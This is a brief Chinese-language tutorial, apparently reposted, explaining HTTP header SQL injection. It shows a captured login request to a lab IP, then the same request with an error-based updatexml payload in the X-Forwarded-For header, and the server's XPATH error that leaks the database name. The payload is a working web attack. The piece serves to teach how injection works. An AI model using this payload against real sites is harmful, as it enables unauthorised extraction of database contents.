http頭部注入

我們首先可以在瀏覽器設置手動代理模式，然后通過burpsuite進行代理配置后進行抓包，如下是一個網站登錄頁面的http頭部信息：

POST /baji/check_login.php HTTP/1.1 Host: 192.168.120.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://192.168.120.137/baji/login.php Cookie: PHPSESSID=0minmo2e9at6uucdton5udeg05 DNT: 1 X-Forwarded-For: 8.8.8.8 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 29username=admin&password=admin

因為我們這個網站代碼中的ip字段和數據庫中有交互，所以我們可以通過http頭部信息中的X-Forwarded-For字段進行注入，注入代碼如下：

POST /baji/check_login.php HTTP/1.1 Host: 192.168.120.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://192.168.120.137/baji/login.php Cookie: PHPSESSID=0minmo2e9at6uucdton5udeg05 DNT: 1 X-Forwarded-For: 8.8.'and updatexml(1,(concat(0x23,database(),0x23)),3) and'.8 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 29username=admin&password=admin

服務器的回應：

HTTP/1.1 200 OK Date: Tue, 25 Jun 2019 11:05:32 GMT Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45 X-Powered-By: PHP/5.4.45 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 46 Connection: close Content-Type: text/html;charset=utf-8??￥èˉ￠?—￥??—??oé”?XPATH syntax error: '#baji#'

error后面的baji就是我們想要的結果。
這就是我理解的http頭部注入的原理，http頭部注入的前提是頭部字段中的數據要與數據庫產生交互，然后把你的注入代碼組合到相應的字段里。

總結

以上是生活随笔為你收集整理的http头部注入的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。